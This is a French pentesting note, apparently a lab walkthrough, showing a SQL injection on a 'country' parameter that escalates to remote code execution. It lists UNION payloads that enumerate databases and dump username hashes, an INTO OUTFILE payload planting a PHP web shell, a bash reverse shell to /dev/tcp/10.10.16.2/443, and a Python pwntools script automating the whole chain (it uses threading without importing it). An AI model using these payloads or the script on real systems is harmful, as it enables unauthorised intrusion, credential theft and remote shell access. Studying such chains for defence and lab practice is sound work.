SQLI (SQLI to RCE) - Pentesting Web

Vulnérabilité SQLi:

Ouverture de BurpSuite :

En tentant une injection SQL dans la variable "country", une erreur est générée :

&country=Brazil'

Étapes de l'injection SQL :

Afficher le nom de la base de données :

&country=Brazil' union select database()--

Afficher les noms de toutes les bases de données :

&country=Brazil' union select schema_name from information_schema.schemata-- -

Voir les tables de la base "registration" :

&country=Brazil' union select table_name from information_schema.tables where table_schema="registration"-- -

Voir les colonnes de la table "registration" :

&country=Brazil' union select column_name from information_schema.columns where table_schema="registration" and table_name="registration"-- -

Voir le contenu des colonnes :

&country=Brazil' union select group_concat(username,0x3a,userhash) from registration-- -

SQLI -> RCE (INTO OUTFILE)

Créer un fichier dans le répertoire "/var/www/html" :

&country=Brazil' union select "testing" into outfile "/var/www/html/test.txt"-- -

Tenter d'insérer un fichier PHP :

&country=Brazil' union select "<?php system($_REQUEST['cmd']); ?>" into outfile "/var/www/html/cmd.php"-- -

Capacité d'exécuter des commandes :

Exécuter un reverse shell :

bash -c "bash -i >%26 /dev/tcp/10.10.16.2/443 0>%261"

Mettre en écoute avec netcat.

nc -nvlp 443

Script Automatisation:

Voici un script en python qui automatise tout le processus :

from pwn import *
import signal, pdb, requests
import sys

def def_handler(sig, frame):
    print("\n\n[exiting]...\n")
    sys.exit(1) 

signal.signal(signal.SIGINT, def_handler)

if len(sys.argv) != 3:
    log.failure("uso: %s <ip-address> filename" % sys.argv[0]) 
    sys.exit(1)

ip_address = sys.argv[1]
filename = sys.argv[2]
main_url = "http://%s/" % ip_address
lport = 443 

def createFile():
    data_post = {
        'username': 'caa',
        'country': """Brazil' union select "<?php system($_REQUEST['cmd']); ?>" into outfile "/var/www/html/%s"-- - """ % (filename)
    }

    r = requests.post(main_url, data=data_post)

def getAccess():
    data_post = {
        'cmd': "bash -c 'bash -i >& /dev/tcp/10.10.14.76/443 0>&1'"
    }

    r = requests.post(main_url + "%s" % filename, data=data_post)

if __name__ == '__main__':
    createFile()
    try:
        threading.Thread(target=getAccess, args=()).start()
    except Exception as e:
        log.error(str(e))
    shell = listen(lport, timeout=20).wait_for_connection()
    shell.interactive()

Mis à jour il y a 11 mois

Ce contenu vous a-t-il été utile ?